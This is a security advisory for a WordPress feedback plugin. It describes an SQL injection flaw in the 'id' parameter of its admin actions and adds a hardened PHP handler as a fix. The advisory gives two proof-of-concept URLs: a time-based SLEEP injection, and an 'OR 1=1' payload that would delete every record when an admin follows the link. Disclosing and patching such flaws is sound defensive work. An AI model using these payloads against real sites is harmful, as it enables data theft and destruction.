The plugin does not escape or validate the id GET parameter before using it in SQL statements, leading to SQL injection issues.
https://example.com/wp-admin/admin.php?page=jiangqie_ow_free_feedback&action=detail&id=1+AND+(SELECT+*+FROM+(SELECT(SLEEP(5)))a)

Could also make a logged in admin delete all the records:

https://example.com/wp-admin/admin.php?page=jiangqie_ow_free_feedback&action=delete&id=1+OR+1%3D1
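
A hardened handler for the detail and delete actions, as an added example (not the plugin's own code and not its actual patch). The function name, the table suffix `jq_feedback`, the nonce action `jq_feedback_action` and the `manage_options` capability are assumptions made for illustration; the WordPress calls are the standard core APIs.

```php
<?php
// Added example. Hypothetical names: jq_feedback_admin_action(), the table
// suffix 'jq_feedback' and the nonce action 'jq_feedback_action'.
function jq_feedback_admin_action() {
    global $wpdb;

    // Assumed capability; only administrators may reach the feedback records.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Forbidden', '', array( 'response' => 403 ) );
    }

    $action = isset( $_GET['action'] ) ? sanitize_key( wp_unslash( $_GET['action'] ) ) : '';

    // Validate: absint() keeps only the leading integer, so "1 OR 1=1"
    // becomes 1 and a non-numeric value becomes 0, which is rejected.
    $id = isset( $_GET['id'] ) ? absint( $_GET['id'] ) : 0;
    if ( 0 === $id ) {
        wp_die( 'Invalid id', '', array( 'response' => 400 ) );
    }

    $table = $wpdb->prefix . 'jq_feedback'; // built server-side, never from input

    if ( 'detail' === $action ) {
        // Pattern the advisory describes (raw id concatenated into the query):
        //   $wpdb->get_row( "SELECT * FROM $table WHERE id = " . $_GET['id'] );
        // Escape: bind the value with a %d placeholder instead.
        return $wpdb->get_row(
            $wpdb->prepare( "SELECT * FROM {$table} WHERE id = %d", $id )
        );
    }

    if ( 'delete' === $action ) {
        // Nonce check, so a link followed by a logged-in admin does not
        // trigger a deletion. The admin page must build its delete links
        // with wp_nonce_url( $url, 'jq_feedback_action' ).
        check_admin_referer( 'jq_feedback_action' );

        // $wpdb->delete() prepares the WHERE clause itself; '%d' forces
        // an integer comparison on the id column.
        return $wpdb->delete( $table, array( 'id' => $id ), array( '%d' ) );
    }

    return null;
}
```

With this handler, both request strings shown above resolve to the single record with id 1, and the delete request is refused unless it carries a valid nonce.
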
CPE

Name | Operator | Version |
---|---|---|
jiangqie-official-website-mini-program | lt | 1.1.1 |